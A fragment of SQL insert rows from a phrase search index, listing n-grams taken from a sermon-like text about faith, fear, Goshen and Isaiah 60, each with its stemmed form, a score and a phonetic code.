(276807, 'fear adds', 'fear adds', 0, 1, 1.3, 'F632', 1, '*'),
(276808, 'fear adds to', 'fear adds to', 0, 1, 1.4, 'F6323', 1, '*'),
(276809, 'fear don\'t', 'fear don', 0, 1, 1.3333, 'F6353', 1, '*'),
(276810, 'fear don\'t step', 'fear don step', 0, 1, 1.5, 'F6353231', 1, '*'),
(276811, 'fear is', 'fear is', 0, 1, 1.2333, 'F620', 1, '*'),
(276812, 'fear is also', 'fear is also', 0, 1, 1.4, 'F6242', 1, '*'),
(276813, 'fear pretending', 'fear pretending', 0, 1, 1.5, 'F61635352', 1, '*'),
(276814, 'fear pretending to', 'fear pretending to', 0, 1, 1.6, 'F616353523', 1, '*'),
(276815, 'find god', 'find god', 0, 1, 1.2667, 'F5323', 1, '*'),
(276816, 'find god till', 'find god till', 0, 1, 1.4333, 'F53234', 1, '*'),
(276817, 'first by', 'first by', 0, 1, 1.2667, 'F6231', 1, '*'),
(276818, 'first by faith', 'first by faith', 0, 1, 1.4667, 'F62313', 1, '*'),
(276819, 'for brightness', 'for brightness', 0, 1, 1.4667, 'F6162352', 1, '*'),
(276820, 'for brightness shall', 'for brightness shall', 0, 1, 1.6667, 'F61623524', 1, '*'),
(276821, 'for help', 'for help', 0, 1, 1.2667, 'F641', 1, '*'),
(276822, 'for help and', 'for help and', 0, 1, 1.4, 'F64153', 1, '*'),
(276823, 'for the days', 'for the days', 0, 1, 1.4, 'F632', 1, '*'),
(276824, 'force that', 'forc that', 0, 1, 1.3333, 'F623', 1, '*'),
(276825, 'force that is', 'forc that is', 0, 1, 1.4333, 'F6232', 1, '*'),
(276826, 'from men', 'from men', 0, 1, 1.2667, 'F650', 1, '*'),
(276827, 'from men some', 'from men some', 0, 1, 1.4333, 'F6525', 1, '*'),
(276828, 'get into a', 'get into a', 0, 1, 1.3333, 'G353', 1, '*'),
(276829, 'give light', 'give light', 0, 1, 1.3333, 'G1423', 1, '*'),
(276830, 'give light unto', 'give light unto', 0, 1, 1.5, 'G142353', 1, '*'),
(276831, 'give you an', 'give you an', 0, 1, 1.3667, 'G150', 1, '*'),
(276832, 'gives you if', 'give you if', 0, 1, 1.4, 'G121', 1, '*'),
(276833, 'gives you you', 'give you you', 0, 1, 1.4333, 'G120', 1, '*'),
(276834, 'giving us', 'give us', 0, 1, 1.3, 'G152', 1, '*'),
(276835, 'giving us for', 'give us for', 0, 1, 1.4333, 'G15216', 1, '*'),
(276836, 'glory do', 'glori do', 0, 1, 1.2667, 'G463', 1, '*'),
(276837, 'glory do you', 'glori do you', 0, 1, 1.4, 'G463', 1, '*'),
(276838, 'go down it', 'go down it', 0, 1, 1.3333, 'G353', 1, '*'),
(276839, 'go over it', 'go over it', 0, 1, 1.3333, 'G163', 1, '*'),
(276840, 'go over when', 'go over when', 0, 1, 1.4, 'G165', 1, '*'),
(276841, 'go under', 'go under', 0, 1, 1.2667, 'G536', 1, '*'),
(276842, 'go under and', 'go under and', 0, 1, 1.4, 'G53653', 1, '*'),
(276843, 'go under but', 'go under but', 0, 1, 1.4, 'G53613', 1, '*'),
(276844, 'go up', 'go up', 0, 1, 1.1667, 'G100', 1, '*'),
(276845, 'go up god', 'go up god', 0, 1, 1.3, 'G123', 1, '*'),
(276846, 'god and at', 'god and at', 0, 1, 1.3333, 'G353', 1, '*'),
(276847, 'god is giving', 'god is giving', 0, 1, 1.4333, 'G32152', 1, '*'),
(276848, 'god thy', 'god thy', 0, 1, 1.2333, 'G300', 1, '*'),
(276849, 'god thy glory', 'god thy glory', 0, 1, 1.4333, 'G3246', 1, '*'),
(276850, 'god till', 'god till', 0, 1, 1.2667, 'G340', 1, '*'),
(276851, 'god till next', 'god till next', 0, 1, 1.4333, 'G34523', 1, '*'),
(276852, 'god will give', 'god will give', 0, 1, 1.4333, 'G3421', 1, '*'),
(276853, 'going to mess', 'go to mess', 0, 1, 1.4333, 'G52352', 1, '*'),
(276854, 'going to take', 'go to take', 0, 1, 1.4333, 'G5232', 2, '*'),
(276855, 'goshen', 'goshen', 0, 0, 0.4, 'G500', 1, '*'),
(276856, 'goshen all', 'goshen all', 0, 1, 1.3333, 'G540', 1, '*'),
(276857, 'goshen all the', 'goshen all the', 0, 1, 1.4667, 'G543', 1, '*'),
(276858, 'handling these', 'handl these', 0, 1, 1.4667, 'H5345232', 1, '*'),
(276859, 'handling these two', 'handl these two', 0, 1, 1.6, 'H53452323', 1, '*'),
(276860, 'has two', 'ha two', 0, 1, 1.2333, 'H230', 1, '*'),
(276861, 'has two sides', 'ha two sides', 0, 1, 1.4333, 'H23232', 1, '*'),
(276862, 'have fear', 'have fear', 0, 1, 1.3, 'H160', 1, '*'),
(276863, 'have fear don\'t', 'have fear don', 0, 1, 1.5, 'H16353', 1, '*'),
(276864, 'have not come', 'have not come', 0, 1, 1.4333, 'H15325', 1, '*'),
(276865, 'have what', 'have what', 0, 1, 1.3, 'H130', 1, '*'),
(276866, 'have what is', 'have what is', 0, 1, 1.4, 'H132', 1, '*'),
(276867, 'heart 12 02', 'heart 12 02', 0, 1, 1.3667, 'H630', 1, '*'),
(276868, 'heed to the', 'heed to the', 0, 1, 1.3667, 'H300', 1, '*'),
(276869, 'help and', 'help and', 0, 1, 1.2667, 'H4153', 1, '*'),
(276870, 'help and god', 'help and god', 0, 1, 1.4, 'H415323', 1, '*'),
(276871, 'help us', 'help us', 0, 1, 1.2333, 'H412', 1, '*'),
(276872, 'help us to', 'help us to', 0, 1, 1.3333, 'H4123', 1, '*'),
(276873, 'here that', 'here that', 0, 1, 1.3, 'H630', 1, '*'),
(276874, 'here that is', 'here that is', 0, 1, 1.4, 'H632', 1, '*'),
(276875, 'his children when', 'hi children when', 0, 1, 1.5667, 'H24365', 1, '*'),
(276876, 'how long', 'how long', 0, 1, 1.2667, 'H452', 1, '*'),
(276877, 'how long will', 'how long will', 0, 1, 1.4333, 'H4524', 1, '*'),
(276878, 'i have not', 'i have not', 0, 1, 1.3333, 'I153', 2, '*'),
(276879, 'i will take', 'i will take', 0, 1, 1.3667, 'I432', 2, '*'),
(276880, 'if you take', 'if you take', 0, 1, 1.3667, 'I132', 2, '*'),
(276881, 'in egypt there', 'in egypt there', 0, 1, 1.4667, 'I52136', 1, '*'),
(276882, 'in faith there', 'in faith there', 0, 1, 1.4667, 'I5136', 1, '*'),
(276883, 'in fear', 'in fear', 0, 1, 1.2333, 'I516', 1, '*'),
(276884, 'in fear pretending', 'in fear pretending', 0, 1, 1.6, 'I5161635352', 1, '*'),
(276885, 'in goshen', 'in goshen', 0, 1, 1.3, 'I525', 1, '*'),
(276886, 'in goshen all', 'in goshen all', 0, 1, 1.4333, 'I5254', 1, '*'),
(276887, 'in practice', 'in practice', 0, 1, 1.3667, 'I516232', 1, '*'),
(276888, 'in practice if', 'in practice if', 0, 1, 1.4667, 'I5162321', 1, '*'),
(276889, 'in teaching', 'in teaching', 0, 1, 1.3667, 'I53252', 1, '*'),
(276890, 'in teaching but', 'in teaching but', 0, 1, 1.5, 'I5325213', 1, '*'),
(276891, 'in these days', 'in these days', 0, 1, 1.4333, 'I53232', 1, '*'),
(276892, 'instances', 'instanc', 0, 0, 0.6, 'I52352', 1, '*'),
(276893, 'into a zone', 'into a zone', 0, 1, 1.3667, 'I5325', 1, '*'),
(276894, 'into the days', 'into the days', 0, 1, 1.4333, 'I532', 1, '*'),
(276895, 'into when', 'into when', 0, 1, 1.3, 'I535', 1, '*'),
(276896, 'into when you', 'into when you', 0, 1, 1.4333, 'I535', 1, '*'),
(276897, 'is a prophecy', 'is a prophecy', 0, 1, 1.4333, 'I21612', 1, '*'),
(276898, 'is also someone', 'is also someone', 0, 1, 1.5, 'I2425', 1, '*'),
(276899, 'is always someone', 'is always someone', 0, 1, 1.5667, 'I2425', 1, '*'),
(276900, 'is backing', 'is backing', 0, 1, 1.3333, 'I21252', 1, '*'),
(276901, 'is backing and', 'is backing and', 0, 1, 1.4667, 'I2125253', 1, '*'),
(276902, 'is delaying', 'is delaying', 0, 1, 1.3667, 'I23452', 1, '*'),
(276903, 'is delaying you', 'is delaying you', 0, 1, 1.5, 'I23452', 1, '*'),
(276904, 'is destruction', 'is destruction', 0, 1, 1.4667, 'I23236235', 1, '*'),
(276905, 'is destruction ahead', 'is destruction ahead', 0, 1, 1.6667, 'I232362353', 1, '*'),
(276906, 'is giving', 'is giving', 0, 1, 1.3, 'I2152', 1, '*'),
(276907, 'is giving us', 'is giving us', 0, 1, 1.4, 'I2152', 1, '*'),
(276908, 'is my declaration', 'is my declaration', 0, 1, 1.5667, 'I25324635', 1, '*'),
(276909, 'is normal', 'is normal', 0, 1, 1.3, 'I25654', 1, '*'),
(276910, 'is normal and', 'is normal and', 0, 1, 1.4333, 'I2565453', 1, '*'),
(276911, 'is not so', 'is not so', 0, 1, 1.3, 'I2532', 1, '*'),
(276912, 'is saying here', 'is saying here', 0, 1, 1.4667, 'I2526', 1, '*'),
(276913, 'is saying this', 'is saying this', 0, 1, 1.4667, 'I25232', 1, '*'),
(276914, 'is talking', 'is talking', 0, 1, 1.3333, 'I234252', 1, '*'),
(276915, 'is talking of', 'is talking of', 0, 1, 1.4333, 'I2342521', 1, '*'),
(276916, 'is the currency', 'is the currency', 0, 1, 1.5, 'I232652', 1, '*'),
(276917, 'is the force', 'is the force', 0, 1, 1.4, 'I23162', 1, '*'),
(276918, 'is the time', 'is the time', 0, 1, 1.3667, 'I235', 2, '*'),
(276919, 'is your faith', 'is your faith', 0, 1, 1.4333, 'I2613', 1, '*'),
(276920, 'isaiah 60', 'isaiah 60', 0, 1, 1.3, 'I200', 1, '*'),
(276921, 'isaiah 60 19', 'isaiah 60 19', 0, 1, 1.4, 'I200', 1, '*'),
(276922, 'israelites for', 'israelit for', 0, 1, 1.4667, 'I2643216', 1, '*'),
(276923, 'israelites for help', 'israelit for help', 0, 1, 1.6333, 'I264321641', 1, '*'),
(276924, 'israelites were', 'israelit were', 0, 1, 1.5, 'I264326', 1, '*'),
(276925, 'israelites were in', 'israelit were in', 0, 1, 1.6, 'I2643265', 1, '*'),
(276926, 'it by cash', 'it by cash', 0, 1, 1.3333, 'I312', 1, '*'),
(276927, 'it by faith', 'it by faith', 0, 1, 1.3667, 'I313', 1, '*'),
(276928, 'it first', 'it first', 0, 1, 1.2667, 'I31623', 1, '*'),
(276929, 'it first by', 'it first by', 0, 1, 1.3667, 'I316231', 1, '*'),
(276930, 'it is my', 'it is my', 0, 1, 1.2667, 'I325', 1, '*'),
(276931, 'it now', 'it now', 0, 1, 1.2, 'I350', 1, '*'),
(276932, 'it now what', 'it now what', 0, 1, 1.3667, 'I353', 1, '*'),
(276933, 'it sounds', 'it sounds', 0, 1, 1.3, 'I32532', 1, '*'),
(276934, 'it sounds so', 'it sounds so', 0, 1, 1.4, 'I32532', 1, '*'),
(276935, 'it was their', 'it was their', 0, 1, 1.4, 'I3236', 1, '*'),
(276936, 'item 23', 'item 23', 0, 1, 1.2333, 'I350', 1, '*'),
(276937, 'item 23 from', 'item 23 from', 0, 1, 1.4, 'I35165', 1, '*'),
(276938, 'jesus that failed', 'jesu that failed', 0, 1, 1.5667, 'J3143', 1, '*'),
(276939, 'just one', 'just one', 0, 1, 1.2667, 'J350', 1, '*'),
(276940, 'just one day', 'just one day', 0, 1, 1.4, 'J353', 1, '*'),
(276941, 'k2 item 23', 'k2 item 23', 0, 1, 1.3333, 'K350', 1, '*'),
(276942, 'keep postponing', 'keep postponing', 0, 1, 1.5, 'K123152', 1, '*'),
(276943, 'keep postponing when', 'keep postponing when', 0, 1, 1.6667, 'K1231525', 1, '*'),
(276944, 'key that', 'kei that', 0, 1, 1.2667, 'K300', 1, '*'),
(276945, 'key that god', 'kei that god', 0, 1, 1.4, 'K323', 1, '*'),
(276946, 'kingdom at', 'kingdom at', 0, 1, 1.3333, 'K52353', 1, '*'),
(276947, 'kingdom at the', 'kingdom at the', 0, 1, 1.4667, 'K52353', 1, '*'),
(276948, 'know the difference', 'know the difference', 0, 1, 1.6333, 'K531652', 1, '*'),
(276949, 'know what god', 'know what god', 0, 1, 1.4333, 'K5323', 1, '*'),
(276950, 'knows exactly', 'know exactly', 0, 1, 1.4333, 'K5234', 1, '*'),
(276951, 'knows exactly what', 'know exactly what', 0, 1, 1.6, 'K52343', 1, '*'),
(276952, 'life has two', 'life has two', 0, 1, 1.4, 'L123', 1, '*'),
(276953, 'life will help', 'life will help', 0, 1, 1.4667, 'L141', 1, '*'),
(276954, 'light and thy', 'light and thy', 0, 1, 1.4333, 'L2353', 1, '*'),
(276955, 'light by', 'light by', 0, 1, 1.2667, 'L231', 1, '*'),
(276956, 'light by day', 'light by day', 0, 1, 1.4, 'L2313', 1, '*'),
(276957, 'light in', 'light in', 0, 1, 1.2667, 'L235', 1, '*'),
(276958, 'light in goshen', 'light in goshen', 0, 1, 1.5, 'L23525', 1, '*'),
(276959, 'light unto', 'light unto', 0, 1, 1.3333, 'L2353', 1, '*'),
(276960, 'light unto thee', 'light unto thee', 0, 1, 1.5, 'L2353', 1, '*'),
(276961, 'like there', 'like there', 0, 1, 1.3333, 'L236', 1, '*'),
(276962, 'like there is', 'like there is', 0, 1, 1.4333, 'L2362', 1, '*'),
(276963, 'lomillion', 'lomillion', 0, 0, 0.6, 'L545', 1, '*'),
(276964, 'lomillion to', 'lomillion to', 0, 1, 1.4, 'L5453', 1, '*'),
(276965, 'lomillion to your', 'lomillion to your', 0, 1, 1.5667, 'L54536', 1, '*'),
(276966, 'long will', 'long will', 0, 1, 1.3, 'L524', 1, '*'),
(276967, 'long will you', 'long will you', 0, 1, 1.4333, 'L524', 1, '*'),
(276968, 'longer work', 'longer work', 0, 1, 1.3667, 'L5262', 1, '*'),
(276969, 'longer work this', 'longer work this', 0, 1, 1.5333, 'L526232', 1, '*'),
(276970, 'looks like there', 'look like there', 0, 1, 1.5333, 'L24236', 1, '*'),
(276971, 'lord i', 'lord i', 0, 1, 1.2, 'L630', 1, '*'),
(276972, 'lord i will', 'lord i will', 0, 1, 1.3667, 'L634', 1, '*'),
(276973, 'many people are', 'mani people are', 0, 1, 1.5, 'M146', 1, '*'),
(276974, 'meet you at', 'meet you at', 0, 1, 1.3667, 'M300', 1, '*'),
(276975, 'men are separated', 'men are separated', 0, 1, 1.5667, 'M62163', 1, '*'),
(276976, 'men some will', 'men some will', 0, 1, 1.4333, 'M254', 1, '*'),
(276977, 'mess you', 'mess you', 0, 1, 1.2667, 'M200', 1, '*'),
(276978, 'mess you up', 'mess you up', 0, 1, 1.3667, 'M210', 1, '*'),
(276979, 'moment handling', 'moment handling', 0, 1, 1.5, 'M353452', 1, '*'),
(276980, 'moment handling these', 'moment handling these', 0, 1, 1.7, 'M35345232', 1, '*'),
(276981, 'moon', 'moon', 0, 0, 0.2667, 'M000', 1, '*'),
(276982, 'moon give', 'moon give', 0, 1, 1.3, 'M210', 1, '*'),
(276983, 'moon give light', 'moon give light', 0, 1, 1.5, 'M21423', 1, '*'),
(276984, 'more be', 'more be', 0, 1, 1.2333, 'M610', 1, '*'),
(276985, 'more be your', 'more be your', 0, 1, 1.4, 'M616', 1, '*'),
(276986, 'more thy', 'more thy', 0, 1, 1.2667, 'M630', 1, '*'),
(276987, 'more thy light', 'more thy light', 0, 1, 1.4667, 'M63423', 1, '*'),
(276988, 'most of you', 'most of you', 0, 1, 1.3667, 'M231', 1, '*'),
(276989, 'must work', 'must work', 0, 1, 1.3, 'M2362', 1, '*'),
(276990, 'must work the', 'must work the', 0, 1, 1.4333, 'M23623', 1, '*'),
(276991, 'my declaration', 'my declaration', 0, 1, 1.4667, 'M324635', 1, '*'),
(276992, 'my declaration that', 'my declaration that', 0, 1, 1.6333, 'M3246353', 1, '*'),
(276993, 'natural work', 'natur work', 0, 1, 1.4, 'N36462', 1, '*'),
(276994, 'natural work but', 'natur work but', 0, 1, 1.5333, 'N3646213', 1, '*'),
(276995, 'need to take', 'need to take', 0, 1, 1.4, 'N320', 1, '*'),
(276996, 'neither for', 'neither for', 0, 1, 1.3667, 'N3616', 1, '*'),
(276997, 'neither for brightness', 'neither for brightness', 0, 1, 1.7333, 'N3616162352', 1, '*'),
(276998, 'no longer work', 'no longer work', 0, 1, 1.4667, 'N45262', 1, '*'),
(276999, 'no more be', 'no more be', 0, 1, 1.3333, 'N610', 1, '*'),
(277000, 'no more thy', 'no more thy', 0, 1, 1.3667, 'N630', 1, '*'),
(277001, 'normal', 'normal', 0, 0, 0.4, 'N654', 3, '*'),
(277002, 'normal and', 'normal and', 0, 1, 1.3333, 'N65453', 1, '*'),
(277003, 'normal and usual', 'normal and usual', 0, 1, 1.5333, 'N6545324', 1, '*'),
(277004, 'normally', 'normal', 0, 0, 0.5333, 'N654', 1, '*'),
(277005, 'normally will', 'normal will', 0, 1, 1.4333, 'N654', 1, '*'),
(277006, 'normally will no', 'normal will no', 0, 1, 1.5333, 'N6545', 1, '*'),
(277007, 'not be among', 'not be among', 0, 1, 1.4, 'N3152', 1, '*'),
(277008, 'not come to', 'not come to', 0, 1, 1.3667, 'N3253', 1, '*'),
(277009, 'not so', 'not so', 0, 1, 1.2, 'N320', 1, '*'),
(277010, 'not so in', 'not so in', 0, 1, 1.3, 'N325', 1, '*'),
(277011, 'not the devil', 'not the devil', 0, 1, 1.4333, 'N314', 1, '*'),
(277012, 'not the name', 'not the name', 0, 1, 1.4, 'N350', 1, '*'),
(277013, 'not touching', 'not touching', 0, 1, 1.4, 'N3252', 1, '*'),
(277014, 'not touching them', 'not touching them', 0, 1, 1.5667, 'N325235', 1, '*'),
(277015, 'now what', 'now what', 0, 1, 1.2667, 'N300', 1, '*'),
(277016, 'now what can', 'now what can', 0, 1, 1.4, 'N325', 1, '*'),
(277017, 'now your', 'now your', 0, 1, 1.2667, 'N600', 1, '*'),
(277018, 'now your faith', 'now your faith', 0, 1, 1.4667, 'N613', 1, '*'),
(277019, 'of faith if', 'of faith if', 0, 1, 1.3667, 'O131', 1, '*'),
(277020, 'of faith is', 'of faith is', 0, 1, 1.3667, 'O132', 1, '*'),
(277021, 'of faith you', 'of faith you', 0, 1, 1.4, 'O130', 2, '*'),
(277022, 'of fear', 'of fear', 0, 1, 1.2333, 'O160', 1, '*'),
(277023, 'of fear is', 'of fear is', 0, 1, 1.3333, 'O162', 1, '*'),
(277024, 'of jesus that', 'of jesus that', 0, 1, 1.4333, 'O123', 1, '*'),
(277025, 'of life will', 'of life will', 0, 1, 1.4, 'O1414', 1, '*'),
(277026, 'of the kingdom', 'of the kingdom', 0, 1, 1.4667, 'O1325235', 1, '*'),
(277027, 'of the time', 'of the time', 0, 1, 1.3667, 'O135', 1, '*'),
(277028, 'of your faith', 'of your faith', 0, 1, 1.4333, 'O1613', 1, '*'),
(277029, 'oflack', 'oflack', 0, 0, 0.4, 'O142', 1, '*'),
(277030, 'oflack of', 'oflack of', 0, 1, 1.3, 'O1421', 1, '*'),
(277031, 'oflack of faith', 'oflack of faith', 0, 1, 1.5, 'O14213', 1, '*'),
(277032, 'one day that', 'on day that', 0, 1, 1.4, 'O530', 1, '*'),
(277033, 'only go', 'onli go', 0, 1, 1.2333, 'O542', 1, '*'),
(277034, 'only go up', 'onli go up', 0, 1, 1.3333, 'O5421', 1, '*'),
(277035, 'only meet', 'onli meet', 0, 1, 1.3, 'O5453', 1, '*'),
(277036, 'only meet you', 'onli meet you', 0, 1, 1.4333, 'O5453', 1, '*'),
(277037, 'opportunity to declare', 'opportun to declare', 0, 1, 1.7333, 'O16353246', 1, '*'),
(277038, 'otherwise the', 'otherwis the', 0, 1, 1.4333, 'O3623', 1, '*'),
(277039, 'otherwise the devil', 'otherwis the devil', 0, 1, 1.6333, 'O362314', 1, '*'),
(277040, 'out in fear', 'out in fear', 0, 1, 1.3667, 'O3516', 1, '*'),
(277041, 'out otherwise', 'out otherwise', 0, 1, 1.4333, 'O362', 1, '*'),
(277042, 'out otherwise the', 'out otherwise the', 0, 1, 1.5667, 'O3623', 1, '*'),
(277043, 'over it is', 'over it is', 0, 1, 1.3333, 'O1632', 1, '*'),
(277044, 'over when', 'over when', 0, 1, 1.3, 'O165', 1, '*'),
(277045, 'over when the', 'over when the', 0, 1, 1.4333, 'O1653', 1, '*'),
(277046, 'own faith', 'own faith', 0, 1, 1.3, 'O513', 1, '*'),
(277047, 'own faith don\'ttry', 'own faith don', 0, 1, 1.6, 'O513536', 1, '*'),
(277048, 'people are sending', 'peopl are sending', 0, 1, 1.6, 'P4625352', 1, '*'),
(277049, 'person\'s faith', 'person faith', 0, 1, 1.4667, 'P625213', 1, '*'),
(277050, 'person\'s faith but', 'person faith but', 0, 1, 1.6, 'P62521313', 1, '*'),
(277051, 'point of', 'point of', 0, 1, 1.2667, 'P531', 2, '*'),
(277052, 'point of your', 'point of your', 0, 1, 1.4333, 'P5316', 1, '*'),
(277053, 'postponing', 'postpon', 0, 0, 0.6667, 'P23152', 1, '*'),
(277054, 'postponing when', 'postpon when', 0, 1, 1.5, 'P231525', 1, '*'),
(277055, 'postponing when are', 'postpon when are', 0, 1, 1.6333, 'P2315256', 1, '*'),
(277056, 'practical', 'practic', 0, 0, 0.6, 'P62324', 1, '*'),
(277057, 'practical side', 'practic side', 0, 1, 1.4667, 'P6232423', 1, '*'),
(277058, 'practical side and', 'practic side and', 0, 1, 1.6, 'P623242353', 1, '*'),
(277059, 'practice if', 'practic if', 0, 1, 1.3667, 'P62321', 1, '*'),
(277060, 'practice if you', 'practic if you', 0, 1, 1.5, 'P62321', 1, '*'),
(277061, 'prepare another', 'prepar another', 0, 1, 1.5, 'P616536', 1, '*'),
(277062, 'prepare another person\'s', 'prepar another person', 0, 1, 1.8, 'P61653616252', 1, '*'),
(277063, 'pretending', 'pretend', 0, 0, 0.6667, 'P635352', 1, '*'),
(277064, 'pretending to', 'pretend to', 0, 1, 1.4333, 'P6353523', 1, '*'),
(277065, 'pretending to be', 'pretend to be', 0, 1, 1.5333, 'P63535231', 1, '*'),
(277066, 'prophecy that', 'propheci that', 0, 1, 1.4333, 'P6123', 1, '*'),
(277067, 'prophecy that a', 'propheci that a', 0, 1, 1.5, 'P6123', 1, '*'),
(277068, 'prophetic at', 'prophet at', 0, 1, 1.4, 'P61323', 1, '*'),
(277069, 'prophetic at that', 'prophet at that', 0, 1, 1.5667, 'P61323', 1, '*'),
(277070, 'prophetic side', 'prophet side', 0, 1, 1.4667, 'P61323', 1, '*'),
(277071, 'prophetic side and', 'prophet side and', 0, 1, 1.6, 'P6132353', 1, '*'),
(277072, 'rt', 'rt', 0, 0, 0.1333, 'R300', 1, '*'),
(277073, 'rt the', 'rt the', 0, 1, 1.2, 'R300', 1, '*'),
(277074, 'rt the sun', 'rt the sun', 0, 1, 1.3333, 'R325', 1, '*'),
(277075, 'salary and', 'salari and', 0, 1, 1.3333, 'S4653', 1, '*'),
(277076, 'salary and we', 'salari and we', 0, 1, 1.4333, 'S4653', 1, '*'),
(277077, 'satan if you', 'satan if you', 0, 1, 1.4, 'S351', 1, '*'),
(277078, 'say lord', 'sai lord', 0, 1, 1.2667, 'S463', 1, '*'),
(277079, 'say lord i', 'sai lord i', 0, 1, 1.3333, 'S463', 1, '*'),
(277080, 'saying here', 'sai here', 0, 1, 1.3667, 'S526', 1, '*'),
(277081, 'saying here that', 'sai here that', 0, 1, 1.5333, 'S5263', 1, '*'),
(277082, 'says rt', 'sai rt', 0, 1, 1.2333, 'S630', 1, '*'),
(277083, 'says rt the', 'sai rt the', 0, 1, 1.3667, 'S630', 1, '*'),
(277084, 'school lesser', 'school lesser', 0, 1, 1.4333, 'S426', 1, '*'),
(277085, 'school lesser than', 'school lesser than', 0, 1, 1.6, 'S42635', 1, '*'),
(277086, 'sending', 'send', 0, 0, 0.4667, 'S5352', 2, '*'),
(277087, 'sending their', 'send their', 0, 1, 1.4333, 'S535236', 1, '*'),
(277088, 'sending their children', 'send their children', 0, 1, 1.7333, 'S53523624365', 1, '*'),
(277089, 'separated from', 'separ from', 0, 1, 1.4667, 'S163165', 1, '*'),
(277090, 'separated from men', 'separ from men', 0, 1, 1.6, 'S163165', 1, '*'),
(277091, 'shall be no', 'shall be no', 0, 1, 1.3667, 'S415', 1, '*'),
(277092, 'shall be unto', 'shall be unto', 0, 1, 1.4333, 'S4153', 1, '*'),
(277093, 'shall the moon', 'shall the moon', 0, 1, 1.4667, 'S435', 1, '*'),
(277094, 'side and', 'side and', 0, 1, 1.2667, 'S353', 1, '*'),
(277095, 'side and the', 'side and the', 0, 1, 1.4, 'S353', 1, '*'),
(277096, 'side and you', 'side and you', 0, 1, 1.4, 'S353', 1, '*'),
(277097, 'sides', 'side', 0, 0, 0.3333, 'S320', 1, '*'),
(277098, 'sides of', 'side of', 0, 1, 1.2667, 'S321', 1, '*'),
(277099, 'sides of life', 'side of life', 0, 1, 1.4333, 'S32141', 1, '*'),
(277100, 'sides the', 'side the', 0, 1, 1.3, 'S323', 1, '*'),
(277101, 'sides the practical', 'side the practical', 0, 1, 1.6333, 'S323162324', 1, '*'),
(277102, 'simple in', 'simpl in', 0, 1, 1.3, 'S5145', 1, '*'),
(277103, 'simple in teaching', 'simpl in teaching', 0, 1, 1.6, 'S51453252', 1, '*'),
(277104, 'situations and what', 'situat and what', 0, 1, 1.6333, 'S35253', 1, '*'),
(277105, 'so any', 'so any', 0, 1, 1.2, 'S500', 1, '*'),
(277106, 'so any egyptian', 'so any egyptian', 0, 1, 1.5, 'S52135', 1, '*'),
(277107, 'so in', 'so in', 0, 1, 1.1667, 'S500', 1, '*'),
(277108, 'so in practice', 'so in practice', 0, 1, 1.4667, 'S516232', 1, '*'),
(277109, 'so simple', 'so simple', 0, 1, 1.3, 'S514', 1, '*'),
(277110, 'so simple in', 'so simple in', 0, 1, 1.4, 'S5145', 1, '*'),
(277111, 'some will', 'some will', 0, 1, 1.3, 'S540', 1, '*'),
(277112, 'some will go', 'some will go', 0, 1, 1.4, 'S542', 1, '*'),
(277113, 'someone called', 'someon called', 0, 1, 1.4667, 'S5243', 1, '*'),
(277114, 'someone called god', 'someon called god', 0, 1, 1.6, 'S524323', 1, '*'),
(277115, 'someone called satan', 'someon called satan', 0, 1, 1.6667, 'S5243235', 1, '*'),
(277116, 'something stupid', 'someth stupid', 0, 1, 1.5333, 'S5352313', 1, '*'),
(277117, 'something stupid but', 'someth stupid but', 0, 1, 1.6667, 'S535231313', 1, '*'),
(277118, 'sounds so', 'sound so', 0, 1, 1.3, 'S532', 1, '*'),
(277119, 'sounds so simple', 'sound so simple', 0, 1, 1.5333, 'S532514', 1, '*'),
(277120, 'step out', 'step out', 0, 1, 1.2667, 'S313', 1, '*'),
(277121, 'step out in', 'step out in', 0, 1, 1.3667, 'S3135', 1, '*'),
(277122, 'step out otherwise', 'step out otherwise', 0, 1, 1.6, 'S31362', 1, '*'),
(277123, 'stepping', 'step', 0, 0, 0.5333, 'S3152', 1, '*'),
(277124, 'stepping into', 'step into', 0, 1, 1.4333, 'S315253', 1, '*'),
(277125, 'stepping into when', 'step into when', 0, 1, 1.6, 'S3152535', 1, '*'),
(277126, 'stupid but', 'stupid but', 0, 1, 1.3333, 'S31313', 1, '*'),
(277127, 'stupid but to', 'stupid but to', 0, 1, 1.4333, 'S31313', 1, '*'),
(277128, 'such instances', 'such instances', 0, 1, 1.4667, 'S52352', 1, '*'),
(277129, 'such times', 'such times', 0, 1, 1.3333, 'S352', 1, '*'),
(277130, 'such times men', 'such times men', 0, 1, 1.4667, 'S3525', 1, '*'),
(277131, 'sun', 'sun', 0, 0, 0.2, 'S500', 1, '*'),
(277132, 'sun shall', 'sun shall', 0, 1, 1.3, 'S524', 1, '*'),
(277133, 'sun shall be', 'sun shall be', 0, 1, 1.4, 'S5241', 1, '*'),
(277134, 'sun will', 'sun will', 0, 1, 1.2667, 'S540', 1, '*'),
(277135, 'sun will no', 'sun will no', 0, 1, 1.3667, 'S545', 1, '*'),
(277136, 'sun won\'t', 'sun won', 0, 1, 1.3, 'S530', 1, '*'),
(277137, 'sun won\'t go', 'sun won go', 0, 1, 1.4, 'S532', 1, '*'),
(277138, 'supernatural experiences', 'supernatur experiences', 0, 1, 1.8, 'S16536421652', 1, '*'),
(277139, 'supernatural experiences you', 'supernatur experiences you', 0, 1, 1.9333, 'S16536421652', 1, '*'),
(277140, 'supporting', 'support', 0, 0, 0.6667, 'S16352', 1, '*'),
(277141, 'supporting you', 'support you', 0, 1, 1.4667, 'S16352', 1, '*'),
(277142, 'supporting you just', 'support you just', 0, 1, 1.6333, 'S163523', 1, '*'),
(277143, 'take along this', 'take along this', 0, 1, 1.5, 'T245232', 1, '*'),
(277144, 'take anything', 'take anything', 0, 1, 1.4333, 'T25352', 1, '*'),
(277145, 'take anything that', 'take anything that', 0, 1, 1.6, 'T253523', 1, '*'),
(277146, 'take it first', 'take it first', 0, 1, 1.4333, 'T231623', 1, '*'),
(277147, 'take it now', 'take it now', 0, 1, 1.3667, 'T235', 1, '*'),
(277148, 'take thatis', 'take thatis', 0, 1, 1.3667, 'T232', 1, '*'),
(277149, 'take thatis where', 'take thatis where', 0, 1, 1.5667, 'T2326', 1, '*'),
(277150, 'take the way', 'take the way', 0, 1, 1.4, 'T230', 1, '*'),
(277151, 'take this', 'take this', 0, 1, 1.3, 'T232', 1, '*'),
(277152, 'take this way', 'take this way', 0, 1, 1.4333, 'T232', 1, '*'),
(277153, 'talking of', 'talk of', 0, 1, 1.3333, 'T42521', 1, '*'),
(277154, 'talking of the', 'talk of the', 0, 1, 1.4667, 'T425213', 1, '*'),
(277155, 'teaching but', 'teach but', 0, 1, 1.4, 'T25213', 1, '*'),
(277156, 'teaching but it', 'teach but it', 0, 1, 1.5, 'T25213', 1, '*'),
